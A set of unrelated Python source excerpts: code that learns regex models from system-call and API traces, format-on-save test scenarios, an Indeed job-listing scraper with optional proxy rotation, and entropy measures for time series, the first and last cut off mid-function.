        ## If we have already spot at least a '('
        if len(sequences) != 0:
            tmp = sequences.pop()
            tmp += curr
            sequences.append(tmp)
            continue
        ## Current entry is just a symbol
        entry = symbols[curr]
        if i < i_max-1 and l[i+1] in '?+*':
            entry_obj = RegexSimple(entry,
                                    RegexFlags.from_regex_modifier(l[i+1]))
            i += 1
        else:
            entry_obj = RegexSimple(entry)
        ret.add(entry_obj)
    # A lone nested sequence is unwrapped to avoid a pointless extra level.
    if len(ret.expr) == 1 and type(ret.expr[0]) == RegexSequence:
        ret = ret.expr[0]
    return ret
def align_traces(trace1, trace2):
    """Globally align two traces (Needleman-Wunsch) and decode the result."""
    sym = symbols_generator()
    aligned = nw.global_align(encode_trace(trace1, sym[1]),
                              encode_trace(trace2, sym[1]))
    return (decode_sequence(aligned[0], sym[0]),
            decode_sequence(aligned[1], sym[0]))
def align_regex_trace(regex, trace):
    """Globally align an encoded regex against a trace and decode both sides."""
    sym = symbols_generator()
    aligned = nw.global_align_regex(encode_regex(regex, sym[1]),
                                    encode_trace(trace, sym[1]))
    return (decode_regex(aligned[0], sym[0]),
            decode_sequence(aligned[1], sym[0]))
def sequence_match(regex, seq):
    """True when the encoded trace matches the (anchored) encoded regex."""
    pattern = re.compile(encode_regex_str(regex))
    return pattern.match(encode_trace(seq)) is not None
def gen_regex(seq1, seq2):
    """Merge two gap-aligned sequences into a positional regex: equal
    columns are mandatory, gap columns optional, mismatches become
    mandatory alternatives."""
    assert len(seq1) == len(seq2), "Sequences of different lenght"
    merged = []
    for a, b in zip(seq1, seq2):
        if a == b:
            merged.append((a, RegexFlags.MANDATORY))
        elif a == "-":
            merged.append((b, RegexFlags.OPTIONAL))
        elif b == "-":
            merged.append((a, RegexFlags.OPTIONAL))
        else:
            merged.append(({a, b}, RegexFlags.MANDATORY))
    return merged
def update_regex(reg, seq):
    """Fold one more aligned sequence *seq* into the positional regex
    *reg* (same length): matching columns are kept, gaps turn entries
    optional, and new symbols widen the alternative set."""
    ret = []
    assert len(reg) == len(seq), "Sequences of different lenght"
    for i in range(len(reg)):
        if seq[i] in reg[i][0]:
            ret.append(reg[i])
        elif seq[i] == u"-":
            # Gap in the new sequence: the entry becomes optional.
            ret.append((reg[i][0], RegexFlags.OPTIONAL | reg[i][1]))
        elif reg[i][0] == u"-":
            # NOTE(review): regex payloads are sets (or strings) elsewhere;
            # comparing the payload to "-" and appending a bare string here
            # looks inconsistent with the set-based branches — confirm intent.
            ret.append((seq[i], RegexFlags.OPTIONAL | reg[i][1]))
        elif seq[i] not in reg[i][0]:
            # New symbol at this position: widen the alternative set.
            to_add = set()
            if type(reg[i][0]) == str:
                to_add.add(reg[i][0])
            else:
                to_add |= reg[i][0]
            to_add.add(seq[i])
            ret.append((to_add, reg[i][1]))
        else:
            assert False, "This should never happen"
    return ret
def make_regex_conditional(regex):
    """Return a copy of *regex* with OPTIONAL OR-ed into every entry's flags."""
    conditional = []
    for payload, flags in regex:
        conditional.append((payload, flags | RegexFlags.OPTIONAL))
    return conditional
def total_trace_length(traces):
    """Sum of the lengths of all traces."""
    return sum(map(len, traces))


def avg_trace_length(traces):
    """Mean trace length; raises ZeroDivisionError on an empty list."""
    return total_trace_length(traces) / len(traces)
# Give up after 5 seconds: a pathological regex can backtrack indefinitely.
@timeout(5)
def check_trace_matches(regex, trace):
    # interruptingcow raises RuntimeError on timeout; callers count those
    # separately from genuine mismatches.
    return regex.match_trace(trace, symbols_generator())
def check_traces_match(regex, traces, msg=''):
    """Match *regex* against every trace, printing one dot per trace.

    Returns (matches, timeouts, failures).
    """
    sys.stdout.flush()
    matched = timed_out = failed = 0
    print(msg, end='')
    for trace in traces:
        print('.', end='')
        try:
            ok = check_trace_matches(regex, trace)
        except RuntimeError:
            # Raised by the @timeout wrapper around check_trace_matches.
            timed_out += 1
            continue
        if ok:
            matched += 1
        else:
            failed += 1
    print('')
    return (matched, timed_out, failed)
def regex_from_trace(trace):
    """Turn a single trace into a linear RegexSequence (no alternatives)."""
    seq = RegexSequence()
    for call in trace:
        seq.add(get_syscall_name(call[1]) if call[0] == 'SYS' else call[1])
    return seq
def regex_for_api(kb, api):
    """Learn a regex model for *api* from its non-empty traces.

    Returns (regex_object, successes, timeouts, failures) or None when
    there are no usable traces. With a single trace the regex is its
    literal sequence and the counters are zero.
    """
    traces = [t for t in kb[api] if len(t) != 0]
    if len(traces) == 1:
        return (regex_from_trace(traces[0]), 0, 0, 0)
    if len(traces) == 0:
        return None
    # Train on at most 50 traces (or half of them); the rest is held out.
    if len(traces) > 10:
        train_len = min([50, int(len(traces)/2)])
    else:
        train_len = len(traces)
    test = traces[train_len:]
    traces = traces[0:train_len]
    # Seed the regex from the first pair, then fold in the remaining traces.
    first_alignement = align_traces(*traces[0:2])
    regex = gen_regex(*first_alignement)
    for trace in traces[2:]:
        align = align_regex_trace(regex, trace)
        regex = update_regex(*align)
    reg_obj = RegexSequence.from_list(regex)
    (success, tout, fails) = check_traces_match(reg_obj, traces,
                                                '%s TRAIN' % api)
    print(("### TRAIN Api: %s. %d traces. Matches/Timeouts/Fails %d/%d/%d" +
           " test traces") % (api, len(kb[api]), success, tout, fails))
    # BUG FIX: the assertion message previously contained '%s' but was
    # never interpolated with the API name.
    assert fails == 0, ("Regex for api %s failed to cover all" +
                        " the traces in the training set") % api
    (success, tout, fails) = check_traces_match(reg_obj, test,
                                                '%s TEST' % api)
    print(("### TEST Api: %s. %d traces. Matches/Timeouts/Fails %d/%d/%d" +
           " test traces\n") % (api, len(kb[api]), success, tout, fails))
    return (reg_obj, success, tout, fails)
def regexes_for_kb(kb, syscalls, regexes=None):
    """Build (or resume building) a regex model per API, checkpointing the
    partial result to 'regex.pickle'. APIs with very long traces are
    marked with the Ellipsis sentinel and skipped."""
    # Prime the shared symbol table with every API and syscall name.
    symbols_generator({**kb, **syscalls})
    if regexes is None:
        regexes = {}
    for api, traces in kb.items():
        print(api)
        if avg_trace_length(traces) > 100:
            print("%s traces too big. Skipping" % api)
            regexes[api] = ...
            continue
        # Resume support: only (re)compute missing or failed entries.
        if api not in regexes or regexes[api] is None:
            regexes[api] = regex_for_api(kb, api)
        # Periodic checkpoint so a crash does not lose everything.
        if len(regexes) % 100 == 0:
            dump_to_file(regexes, 'regex.pickle')
    dump_to_file(regexes, 'regex.pickle')
    return regexes
def test_regex(kb, api, regex):
    """Re-run the match check for one API against its non-empty traces."""
    non_empty = [trace for trace in kb[api] if len(trace) != 0]
    return check_traces_match(regex, non_empty)
def models_for_kb(kb, syscalls, models=None, debug=False):
    # Thin delegation: APIGenericModel owns the actual model construction.
    return APIGenericModel.generate_models(kb, syscalls, models, debug)
def models_less_generic(kb, syscalls, models=None, debug=False):
    # Same pipeline with the stricter APILessGenericModel variant.
    return APILessGenericModel.generate_models(kb, syscalls, models, debug)
# A run made exclusively of optional occurrences, e.g. "x?x?x?".
regex_find_conditional = re.compile(r'((.\?)+)')


def shrink_regex_repetitions(m):
    """Collapse a run of one repeated symbol to `s+` (or `s*` when every
    occurrence in the run was optional)."""
    symbol = m.groups()[0]
    whole = m.group()
    cond = regex_find_conditional.search(whole)
    entirely_optional = cond is not None and cond.group() == whole
    return symbol + ('*' if entirely_optional else '+')
# A run of the same (possibly optional) single symbol, e.g. "aa?aa".
regex_find_repetitions = re.compile(r'(.)\??(\1\??)+')


def regex_handle_single_call_repetitions(regex):
    """Rewrite runs of one repeated symbol in *regex* using +/* quantifiers."""
    encoded = encode_regex_str(regex)
    collapsed = regex_find_repetitions.sub(shrink_regex_repetitions, encoded)
    return decode_regex_str(collapsed)
def shrink_repetitions(m):
    """Collapse a repeated subsequence to `sym+`, parenthesising multi-char runs."""
    symbol = m.groups()[0]
    if len(symbol) > 1:
        return '(' + symbol + ')+'
    return symbol + '+'


# A subsequence of one or more symbols immediately repeated at least once.
find_repetitions = re.compile(r'(.+?)(\1)+')
def handle_call_repetitions(seq, original=None):
    """Iteratively collapse repeated subsequences in a trace or regex into
    `(...)`+ groups, recursing until a fixpoint; every candidate is
    validated against the *original* trace before being accepted.
    Returns the collapsed regex object, or None when no valid collapse
    exists."""
    if original is None:
        original = seq
    # Accept either a raw trace (list) or an existing RegexSequence.
    if type(seq) == list:
        trace = seq
        enc = encode_trace(trace)
        new_reg = find_repetitions.sub(shrink_repetitions, enc)
    elif (isinstance(seq, RegexSequence) or
          issubclass(type(seq), RegexSequence)):
        reg = seq
        enc = reg.to_string_regex(symbols_generator())
        new_reg = find_repetitions.sub(shrink_repetitions, enc)
    else:
        print(type(seq))
        assert False, seq
    if enc == new_reg:
        # Fixpoint reached: nothing left to collapse.
        if enc == encode_trace(original):
            try:
                return decode_regex_str(encode_trace(original))
            except:  # NOTE(review): bare except — hides decode errors by design?
                return None
        return None
    try:
        # The collapsed pattern must still cover the original trace.
        if not re.compile(new_reg).match(encode_trace(original)):
            raise re.error('')
    except re.error:
        return None
    try:
        new_reg_obj = decode_regex_str(new_reg)
    except:  # NOTE(review): bare except — hides decode errors by design?
        return None
    # Full (anchored) structural match against the original trace.
    match = new_reg_obj.match_trace(original, symbols_generator(), full=True)
    if not match:
        return None
    else:
        # Try to collapse further; fall back to the current result.
        res = handle_call_repetitions(new_reg_obj, original)
        if res:
            return res
        else:
            return new_reg_obj
def measures_regexes(regexes):
    """Aggregate (success, timeout, fail) ratios over all regex results.

    Entries that are None (too short) or Ellipsis (too long) are skipped.
    Raises ZeroDivisionError when no entry contributed any counts.
    """
    successes = timeouts = failures = 0
    too_long = set()
    too_short = set()
    for api, result in regexes.items():
        if result is None:
            too_short.add(api)
        elif result is ...:
            too_long.add(api)
        else:
            successes += result[0]
            timeouts += result[1]
            failures += result[2]
    grand_total = successes + timeouts + failures
    return (successes / grand_total,
            timeouts / grand_total,
            failures / grand_total)
def measures_models(models):
    """Aggregate (success_ratio, fail_ratio) over all evaluated models;
    None entries are skipped. Raises ZeroDivisionError with no counts."""
    failures = 0
    successes = 0
    skipped = set()
    for api, model in models.items():
        if model is None:
            skipped.add(api)
            continue
        failures += model.test_results[1]
        successes += model.test_results[0]
    total = failures + successes
    return successes / total, failures / total
def troublesome_regexes(regexes, min=0.15, max=1):
    """APIs whose regex failure ratio lies in [min, max], worst first.

    NOTE: `min`/`max` shadow the builtins but are part of the established
    keyword interface, so they are kept.
    """
    flagged = set()
    for api, result in regexes.items():
        if result is ... or result is None:
            continue
        total = sum(result[1:])
        if total == 0:
            continue
        fail_ratio = result[3] / total
        if min <= fail_ratio <= max:
            flagged.add((api, fail_ratio, total))
    return sorted(list(flagged), key=lambda entry: -entry[1])
def troublesome_models(models, min=0.15, max=1):
    """APIs whose model failure ratio lies in [min, max], worst first.

    NOTE: `min`/`max` shadow the builtins but are part of the established
    keyword interface, so they are kept.
    """
    flagged = set()
    for api, model in models.items():
        if model is None:
            continue
        total = sum(model.test_results)
        if total == 0:
            continue
        fail_ratio = model.test_results[1] / total
        if min <= fail_ratio <= max:
            flagged.add((api, fail_ratio, total))
    return sorted(list(flagged), key=lambda entry: -entry[1])
def expensive_regexes(regexes, min=0.01, max=1):
    """APIs whose regex timeout ratio lies in [min, max], worst first.

    NOTE: `min`/`max` shadow the builtins but are part of the established
    keyword interface, so they are kept.
    """
    flagged = set()
    for api, result in regexes.items():
        if result is ... or result is None:
            continue
        total = sum(result[1:])
        if total == 0:
            continue
        timeout_ratio = result[2] / total
        if min <= timeout_ratio <= max:
            flagged.add((api, timeout_ratio, total))
    return sorted(list(flagged), key=lambda entry: -entry[1])
def regexes_split_test_results(regexes_test):
    """Split {api: (regex, success, tout, fails)} into two dicts:
    {api: regex} and {api: (success, tout, fails)}. None entries are
    carried over as None in both; Ellipsis entries are dropped."""
    valid = {api: res for api, res in regexes_test.items()
             if res is not None and res is not ...}
    missing = {api: None for api, res in regexes_test.items() if res is None}
    return ({**{api: res[0] for api, res in valid.items()}, **missing},
            {**{api: tuple(res[1:]) for api, res in valid.items()}, **missing})
def prune_kb_from_empties(kb, empties):
    """Return a new KB with every call whose target is in *empties* removed."""
    return {api: [[call for call in trace if call[1] not in empties]
                  for trace in traces]
            for api, traces in kb.items()}
def prune_kb_from_signals(kb):
    """Return a new KB with strace signal-delivery entries (matching the
    module-level signal_regex) removed from every trace."""
    pruned = {}
    for api, traces in kb.items():
        pruned[api] = [[call for call in trace
                        if not signal_regex.match(call[1])]
                       for trace in traces]
    return pruned
def shuffle_kb(kb):
    """Shuffle every API's trace list in place."""
    for traces in kb.values():
        random.shuffle(traces)
def apis_same_models(models):
    """Return pairs of APIs whose models share at least one element.

    Each API is paired with at most the first later API it overlaps with
    (the inner scan stops on the first hit). None models are skipped.
    """
    overlapping = set()
    apis = list(models.keys())
    for i, first in enumerate(apis):
        if models[first] is None:
            continue
        for second in apis[i+1:]:
            if models[second] is None:
                continue
            if len(models[first] & models[second]) > 0:
                overlapping.add((first, second))
                break
    return overlapping
def api_match_model(models, to_check):
    """Print every API whose model shares at least one element with *to_check*."""
    for api, model in models.items():
        if model is not None and len(model & to_check) > 0:
            print('api %s matches' % api)
def find_leaves_models(models, syscalls):
    """Map each API to its model's non-empty set of leaf sub-models."""
    if type(syscalls) == dict:
        syscalls = set(syscalls.keys())
    leaves = {}
    for api, model in models.items():
        if model is None:
            continue
        leaf_set = model.leaf_models(syscalls, models)
        if len(leaf_set) > 0:
            leaves[api] = leaf_set
    return leaves
def kb_remove_hanging_calls(kb):
    """Delete, in place, every API call whose target is unknown to the KB."""
    for api, traces in kb.items():
        for trace in traces:
            idx = 0
            while idx < len(trace):
                kind, target = trace[idx][0], trace[idx][1]
                if kind == 'API' and target not in kb:
                    print("Removing call to %s from API %s" % (target, api))
                    del trace[idx]
                else:
                    idx += 1
def overlapping_traces(kb, api):
    """Find syscall-only traces of other APIs whose syscall-name sequence
    equals that of some trace of *api*. Returns [(other_api, names), ...]."""
    own = {tuple(get_syscall_name(call[1])
                 for call in get_syscall_list_from_trace(trace))
           for trace in kb[api]}
    matches = []
    for other, traces in kb.items():
        if other == api:
            continue
        for trace in traces:
            # Only non-empty traces that contain no sub-API calls qualify.
            if len(trace) == 0 or len(get_api_list_from_trace(trace)) != 0:
                continue
            key = tuple(get_syscall_name(call[1])
                        for call in get_syscall_list_from_trace(trace))
            if key in own:
                matches.append((other, key))
    return matches
#### local rare models: models whose frequency within the realizations of a given API is lower than a threshold
@persist("local_rare_cache", (1,))
def local_rare_models(models, threshold=0.01):
    """Return {api: [rare_model, ...]} for models seen in fewer than
    *threshold* of the API's realizations. APIs with no rare models are
    omitted. The @persist decorator caches results on disk — presumably
    keyed on the positional args in its second argument; TODO confirm."""
    ret = {}
    gen = ((api, ms) for api, ms in models.items() if ms)
    for api, ms in gen:
        # _counters maps each model to its hit count, plus a 'TOTAL' entry.
        tot = ms._counters['TOTAL']
        ret[api] = []
        for m, cnt in ms._counters.items():
            if type(m) == str and m == 'TOTAL':
                continue
            if (cnt/tot) < threshold:
                ret[api].append(m)
        if len(ret[api]) == 0:
            del ret[api]
    return ret
def find_model_occurrence(models, find):
    """Return the set of APIs whose model collection contains *find*."""
    return {api for api, ms in models.items()
            if ms is not None and any(m == find for m in ms)}
## rare = {API: [model1, model2, ...], ...}
#### global rare models: models that are rare for each API in which they appear
@persist("global_rare_cache", (2,))
def global_rare_models(models, rare=None, threshold=0.01):
    """Return {model: apis} for models whose every occurrence across the
    KB is a rare one (i.e. rare in each API where they appear)."""
    if rare is None:
        rare = local_rare_models(models, threshold)
    # Flatten all per-API rare lists, keeping insertion order.
    # NOTE(review): reduce() raises TypeError when `rare` is empty.
    tmp = reduce(lambda x, y: x+y, [x for x in rare.values()])
    rare_list = []
    for m in tmp:
        if m not in rare_list:
            rare_list.append(m)
    # A model is globally rare when the APIs where it is rare coincide
    # with all the APIs where it occurs at all.
    rare_occurrences = {m: find_model_occurrence(rare, m) for m in rare_list}
    all_occurrences = {m: find_model_occurrence(models, m) for m in rare_list}
    global_rare = {m: rare_occurrences[m] for m in rare_list
                   if all_occurrences[m] == rare_occurrences[m]}
    return global_rare
|
# Each scenario is (settings dict, file name, expected outcome).
# A string-valued 'format_on_save' appears to act as a pattern the file
# name must match for formatting to trigger — TODO confirm against the
# consumer of these scenarios.
format_on_save_scenarios = [
    ({}, '', False),
    ({'format_on_save': True}, '', True),
    ({'format_on_save': False}, '', False),
    ({'format_on_save': '.test$'}, 'file.txt', False),
    ({'format_on_save': '.test$'}, 'file.test', True)
]
|
#!/usr/bin/env python
# coding: utf-8
__author__ = 'Lrakotoson'
__copyright__ = 'Copyright 2020, Jobtimize'
__license__ = 'MIT'
__version__ = '0.1.5'
__maintainer__ = 'Loïc Rakotoson'
__email__ = 'contact@loicrakotoson.com'
__status__ = 'planning'
__all__ = ['IndeedScrap']
""
from .rotateproxies import RotateProxies
from requests import get, Timeout
from requests.exceptions import HTTPError, ProxyError
from concurrent.futures import ThreadPoolExecutor
from itertools import islice
from datetime import datetime, timedelta
from bs4 import BeautifulSoup
import re
import warnings
""
def scrapPage(url, proxy=None):
    """
    Scrap an html document from the URL
    :url: page url
    :proxy: dict of proxy
    :return: html page, BeautifulSoup object
    :raises HTTPError: on 4xx/5xx responses (callers catch this)
    """
    with get(url, proxies=proxy) as response:
        # BUG FIX: requests only raises HTTPError when raise_for_status()
        # is called; without it, every `except HTTPError` in the callers
        # was dead code and error pages were parsed as results.
        response.raise_for_status()
        page = BeautifulSoup(response.text, 'html.parser')
    return page
""
def scrapID(page):
    """
    Collect the IDs of the job ads published on the active page
    :page: html page, BeautifulSoup object
    :return: set of IDs
    """
    results_column = page.find(id="resultsCol")
    cards = results_column.findAll("div", {"class": "jobsearch-SerpJobCard"})
    return {card["data-jk"] for card in cards}
""
def stripmatch(page):
    """
    Get the number of pages visited and match for the current search
    :page: html page, BeautifulSoup object
    :return: (current page number, total match count); (None, None) when
             the counter element is missing or holds no numbers, and
             match is None when only the page number is present
    """
    try:
        text = page.find(id="searchCountPages").text.strip()
    except AttributeError:
        # Element missing: page.find() returned None.
        return None, None
    numlist = re.findall(r'-?\d+\.?\d*', text)
    # BUG FIX: with fewer than two numbers the original raised
    # IndexError (empty list) or ValueError from int('').
    if not numlist:
        return None, None
    repage = int(numlist[0])
    if len(numlist) < 2:
        match = None
    elif len(numlist) == 2:
        match = int(numlist[1])
    else:
        # Thousands separators split the count, e.g. "1,000" -> ['1', '000'].
        match = int(''.join(numlist[1:]))
    return repage, match
""
def scrapIndeedID(searchList, countryList, maxpage = 1, prox=False):
    """
    Extract jobIDs from the search results provided by Indeed
    :searchList: list of jobs or keywords to search
    :country: list of countries in 2-letter code
    :maxpage: int, max results page
    :prox: bool, default False
    :return: set of tuples, country and ID
    """
    # Indeed caps pagination; anything above 101 pages is clamped.
    if maxpage > 101:
        warnings.warn("maxpage args should be under 101", UserWarning)
        maxpage = 101
    setID = set()
    for search in searchList:
        search = search.replace(" ", "+")
        if prox: proxies = RotateProxies()
        proxy = None
        for country_general in countryList:
            country = country_general.lower()
            if country == "us": country = "www" #"us" note redirected
            listID = set()
            limit = 50  # results requested per page
            start = repage = count = 0
            # Unknown total until the first page is parsed.
            match = float('inf')
            while repage <= maxpage:
                if len(listID) < match:
                    url = "https://{}.indeed.com/jobs?q={}&limit={}&start={}".format(
                        country, search, limit, start)
                    # Rotate the proxy every 50 requests.
                    if count % 50 == 0 and prox: proxy = proxies.next()
                    try:
                        page = scrapPage(url, proxy)
                    except (Timeout, ProxyError):
                        # Retry with a fresh proxy, or give up on this country.
                        if prox:
                            proxy = proxies.next()
                            continue
                        else:
                            break
                    except HTTPError:
                        break
                    else:
                        repage, match = stripmatch(page)
                        count += 1
                        # Stop when the counter is missing or pagination stalls.
                        if (match is None or repage < count):
                            break
                        else:
                            listID = listID.union({(country_general, jobID)
                                                   for jobID in list(scrapID(page))
                                                   })
                            start += limit
                else: break
            setID = setID.union(listID)
    return setID
""
def dicoFromScrap(args):
    """
    Normalize the data of the request response
    :args: tuple of tupleID and proxy
    :tupleID: tuple of country code and Indeed job ID
    :proxy: dict of proxy
    :return: standard dictionary of useful elements
    """
    tupleID, proxy = args
    dico = {}
    url = "https://www.indeed.com/viewjob?jk={}".format(tupleID[1])
    try:
        page = scrapPage(url, proxy)
    except HTTPError:
        # Unreachable job page: return the empty dict.
        return dico
    def postedDate(page):
        # Parse the "N days ago" footer into an ISO timestamp.
        try:
            date = int(
                re.findall(
                    r'-?\d+\.?\d*',
                    page.find("div", {
                        "class": "jobsearch-JobMetadataFooter"
                    }).text)[0])
        except IndexError:
            # No number in the footer: assume posted today.
            posted = datetime.now().isoformat(timespec='seconds')
        else:
            posted = (datetime.now() +
                      timedelta(days=-date)).isoformat(timespec='seconds')
            # Indeed caps the footer at "30+ days ago"; mark that case.
            if date == 30: posted = "+ " + posted
        return posted
    def companyName(page):
        try:
            name = page.find("div", {"class": "icl-u-lg-mr--sm"}).text
        except AttributeError:
            # NOTE(review): if this fallback lookup also fails, the error
            # propagates — the bare except below does not catch exceptions
            # raised inside this handler.
            name = page.find("span", {
                "class": "icl-u-textColor--success"
            }).text
        except:
            name = ""
        return name
    dico["country"] = tupleID[0].upper()
    dico["url"] = url
    dico["description"] = page.find(id="jobDescriptionText").text
    # Title is "header - city - ..." on Indeed job pages.
    dico["header"], dico["city"], *_ = page.head.title.text.split(" - ")
    dico["company"] = companyName(page)
    dico["type"] = dico["category"] = ""
    dico["posted"] = postedDate(page)
    return dico
""
def IndeedScrap(searchList, countryList, maxpage = 1, prox=False):
    """
    Extract and normalizes data from the search results
    :searchList: list of jobs or keywords to search
    :country: list of countries in 2-letter code
    :maxpage: int, max number of page to scrap
    :prox: bool, default False
    :return: list of standard dictionaries
    """
    scraped = list()
    setID = scrapIndeedID(searchList, countryList, maxpage, prox)
    # Scale the thread pool with the workload (1 thread per 5 IDs past 20).
    if len(setID) < 20:
        workers = len(setID)
    else:
        workers = len(setID) // 5
    if prox:
        # One proxy per worker, repeated to cover every ID.
        proxies = list(islice(RotateProxies().proxies, workers)) * len(setID)
    else:
        proxies = [None] * len(setID)
    workers = 1 if workers==0 else workers
    with ThreadPoolExecutor(workers) as executor:
        try:
            for result in executor.map(dicoFromScrap, zip(setID, proxies)):
                scraped.append(result)
        except:
            # NOTE(review): bare except silently discards any worker error
            # (including KeyboardInterrupt) and truncates the results —
            # consider narrowing and logging.
            pass
    return scraped
|
"""Entropy functions"""
import numpy as np
from numba import jit
from math import factorial, log
from sklearn.neighbors import KDTree
from scipy.signal import periodogram, welch
from .utils import _embed
# NOTE(review): this was probably meant to be `__all__`; as written it
# shadows the builtin `all` inside this module. Renaming would change the
# module's star-import behavior, so confirm with consumers before fixing.
all = ['perm_entropy', 'spectral_entropy', 'svd_entropy', 'app_entropy',
       'sample_entropy', 'lziv_complexity']
def perm_entropy(x, order=3, delay=1, normalize=False):
    """Permutation Entropy.

    Parameters
    ----------
    x : list or np.array
        One-dimensional time series of shape (n_times)
    order : int
        Order of permutation entropy. Default is 3.
    delay : int
        Time delay (lag). Default is 1.
    normalize : bool
        If True, divide by log2(order!) to normalize the entropy between 0
        and 1. Otherwise, return the permutation entropy in bit.

    Returns
    -------
    pe : float
        Permutation Entropy.

    Notes
    -----
    The permutation entropy is a complexity measure for time-series first
    introduced by Bandt and Pompe in 2002, defined as

    .. math:: H = -\\sum p(\\pi)\\log_2(\\pi)

    where the sum runs over all :math:`n!` permutations :math:`\\pi` of order
    :math:`n`. :math:`0 ≤ H (n) ≤ \\log_2(n!)`, with the lower bound attained
    for a monotonic sequence and the upper bound for a completely random
    system where all :math:`n!` permutations appear with equal probability.

    References
    ----------
    Bandt, Christoph, and Bernd Pompe. "Permutation entropy: a
    natural complexity measure for time series." Physical review letters
    88.17 (2002): 174102.

    Examples
    --------
    >>> from entropy import perm_entropy
    >>> x = [4, 7, 9, 10, 6, 11, 3]
    >>> print(perm_entropy(x, order=2))
    0.9182958340544896
    >>> print(perm_entropy(x, order=3, normalize=True))
    0.5887621559162939
    """
    x = np.array(x)
    # Positional weights used to encode each ordinal pattern as one integer.
    weights = np.power(order, range(order))
    # Embed the series and rank each window to get its ordinal pattern.
    patterns = _embed(x, order=order, delay=delay).argsort(kind='quicksort')
    # Unique integer code per pattern.
    codes = np.multiply(patterns, weights).sum(1)
    # Empirical pattern distribution.
    _, counts = np.unique(codes, return_counts=True)
    probs = np.true_divide(counts, counts.sum())
    pe = -np.multiply(probs, np.log2(probs)).sum()
    if normalize:
        pe /= np.log2(factorial(order))
    return pe
def spectral_entropy(x, sf, method='fft', nperseg=None, normalize=False):
    """Spectral Entropy.

    Parameters
    ----------
    x : list or np.array
        One-dimensional time series of shape (n_times)
    sf : float
        Sampling frequency, in Hz.
    method : str
        Spectral estimation method:
        * ``'fft'`` : Fourier Transform (:py:func:`scipy.signal.periodogram`)
        * ``'welch'`` : Welch periodogram (:py:func:`scipy.signal.welch`)
    nperseg : int or None
        Length of each FFT segment for Welch method.
        If None (default), uses scipy default of 256 samples.
    normalize : bool
        If True, divide by log2(psd.size) to normalize the spectral entropy
        between 0 and 1. Otherwise, return the spectral entropy in bit.

    Returns
    -------
    se : float
        Spectral Entropy

    Raises
    ------
    ValueError
        If ``method`` is neither ``'fft'`` nor ``'welch'``.

    Notes
    -----
    Spectral Entropy is defined to be the Shannon entropy of the power
    spectral density (PSD) of the data:

    .. math:: H(x, sf) = -\\sum_{f=0}^{f_s/2} P(f) \\log_2[P(f)]

    Where :math:`P` is the normalised PSD, and :math:`f_s` is the sampling
    frequency.

    References
    ----------
    Inouye, T. et al. (1991). Quantification of EEG irregularity by
    use of the entropy of the power spectrum. Electroencephalography
    and clinical neurophysiology, 79(3), 204-210.

    Examples
    --------
    >>> from entropy import spectral_entropy
    >>> import numpy as np
    >>> np.random.seed(42)
    >>> x = np.random.rand(3000)
    >>> spectral_entropy(x, sf=100, method='welch')
    6.980045662371389
    >>> spectral_entropy(x, sf=100, method='welch', normalize=True)
    0.9955526198316071
    """
    x = np.array(x)
    # Compute and normalize power spectrum
    if method == 'fft':
        _, psd = periodogram(x, sf)
    elif method == 'welch':
        _, psd = welch(x, sf, nperseg=nperseg)
    else:
        # Previously an unknown method fell through and raised a confusing
        # NameError on `psd`; fail fast with a clear message instead.
        raise ValueError("method must be 'fft' or 'welch', got %r" % (method,))
    psd_norm = np.divide(psd, psd.sum())
    se = -np.multiply(psd_norm, np.log2(psd_norm)).sum()
    if normalize:
        se /= np.log2(psd_norm.size)
    return se
def svd_entropy(x, order=3, delay=1, normalize=False):
    """Singular Value Decomposition entropy.

    Parameters
    ----------
    x : list or np.array
        One-dimensional time series of shape (n_times)
    order : int
        Order of SVD entropy (= length of the embedding dimension).
        Default is 3.
    delay : int
        Time delay (lag). Default is 1.
    normalize : bool
        If True, divide by log2(order) to normalize the entropy between 0
        and 1. Otherwise, return the entropy in bit.

    Returns
    -------
    svd_e : float
        SVD Entropy

    Notes
    -----
    SVD entropy indicates how many eigenvectors are needed for an adequate
    explanation of the data set — i.e. it measures the dimensionality of
    the data:

    .. math::
        H = -\\sum_{i=1}^{M} \\overline{\\sigma}_i log_2(\\overline{\\sigma}_i)

    where :math:`\\sigma_1, ..., \\sigma_M` are the normalized singular
    values of the time-delay embedding matrix of :math:`x`.

    Examples
    --------
    >>> from entropy import svd_entropy
    >>> x = [4, 7, 9, 10, 6, 11, 3]
    >>> print(svd_entropy(x, order=2))
    0.7618909465130066
    >>> print(svd_entropy(x, order=3, normalize=True))
    0.6870083043946692
    """
    x = np.array(x)
    # Singular values of the time-delay embedding matrix.
    sigma = np.linalg.svd(_embed(x, order=order, delay=delay),
                          compute_uv=False)
    # Normalize so the singular values sum to one.
    sigma /= sum(sigma)
    svd_e = -np.multiply(sigma, np.log2(sigma)).sum()
    if normalize:
        svd_e /= np.log2(order)
    return svd_e
def _app_samp_entropy(x, order, metric='chebyshev', approximate=True):
    """Utility function for ``app_entropy`` and ``sample_entropy``.

    Returns the pair phi = (phi(order), phi(order + 1)) computed from
    neighbour counts within radius r = 0.2 * std(x) in the embedded space.
    With ``approximate=True`` the approximate-entropy definition is used,
    otherwise the sample-entropy one (which drops the last template and
    excludes self-matches).
    """
    if metric not in KDTree.valid_metrics:
        raise ValueError('The given metric (%s) is not valid. The valid '
                         'metric names are: %s' % (metric, KDTree.valid_metrics))
    # Tolerance radius, proportional to the signal's standard deviation.
    r = 0.2 * np.std(x, ddof=0)

    # phi(order, r)
    emb1 = _embed(x, order, 1)
    if not approximate:
        # Sample entropy discards the final template vector.
        emb1 = emb1[:-1]
    neighbours1 = KDTree(emb1, metric=metric).query_radius(
        emb1, r, count_only=True).astype(np.float64)

    # phi(order + 1, r)
    emb2 = _embed(x, order + 1, 1)
    neighbours2 = KDTree(emb2, metric=metric).query_radius(
        emb2, r, count_only=True).astype(np.float64)

    phi = np.zeros(2)
    if approximate:
        phi[0] = np.mean(np.log(neighbours1 / emb1.shape[0]))
        phi[1] = np.mean(np.log(neighbours2 / emb2.shape[0]))
    else:
        # Subtract 1 to remove each point's self-match from the counts.
        phi[0] = np.mean((neighbours1 - 1) / (emb1.shape[0] - 1))
        phi[1] = np.mean((neighbours2 - 1) / (emb2.shape[0] - 1))
    return phi
@jit('f8(f8[:], i4, f8)', nopython=True)
def _numba_sampen(x, order, r):
    """
    Fast evaluation of the sample entropy using Numba.

    Single O(n^2) pass over all pairs (i, j): for each lag it tracks the
    length of the current run of consecutive matching samples (|x[j]-x[i]|
    < r) and from those run lengths accumulates the template-match counts
    a[m] and b[m] for embedding dimensions 1..order+1. Returns
    -log(a[order] / b[order]) = -log(A / B), the sample entropy.

    x is a 1D float64 array, order is the embedding dimension m, and r is
    the absolute tolerance (already scaled by the caller).
    """
    n = x.size
    n1 = n - 1
